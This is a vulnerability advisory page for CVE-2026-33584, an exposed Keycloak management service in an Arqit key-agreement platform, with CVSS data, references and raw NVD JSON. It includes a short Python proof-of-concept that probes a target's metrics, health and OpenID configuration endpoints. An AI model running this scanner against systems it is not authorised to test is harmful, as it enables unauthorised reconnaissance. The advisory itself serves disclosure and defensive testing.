CVE-2026-33584

Description

Exposed Keycloak management service in the Arqit Symmetric Key Agreement Platform enables unauthorized access to sensitive debug information such as metrics and health data. This issue affects Symmetric Key Agreement Platform: before 26.03.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Arqit Symmetric Key Agreement Platform < 26.03

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_exploit(target_url):
    """
    POC to check for exposed Keycloak management endpoints.
    """
    # Common paths for Keycloak metrics or admin console
    paths = ["/auth/realms/master/.well-known/openid-configuration", "/metrics", "/health"]
    
    headers = {
        "User-Agent": "CVE-2026-33584-Scanner/1.0"
    }

    for path in paths:
        url = f"{target_url.rstrip('/')}{path}"
        try:
            response = requests.get(url, headers=headers, timeout=5)
            if response.status_code == 200:
                print(f"[+] Potential sensitive data exposed at: {url}")
                print(f"[+] Content-Type: {response.headers.get('Content-Type')}")
            else:
                print(f"[-] {url} returned status code: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {url}: {e}")

if __name__ == "__main__":
    target = "http://example-arqit-platform.com"
    check_exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33584
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33584
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33584/
[4] VulDB https://vuldb.com/cve/CVE-2026-33584
[5] https://www.cvcn.gov.it/cvcn/cve/CVE-2026-33584

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33584", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-13T19:17:07.183", "lastModified": "2026-05-14T17:19:49.973", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposed Keycloak management \nservice in the Arqit Symmetric Key Agreement Platform enables unauthorized access to sensitive debug \ninformation such as metrics and\n health data. This issue affects Symmetric Key Agreement Platform: before 26.03."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-749"}]}], "references": [{"url": "https://www.cvcn.gov.it/cvcn/cve/CVE-2026-33584", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}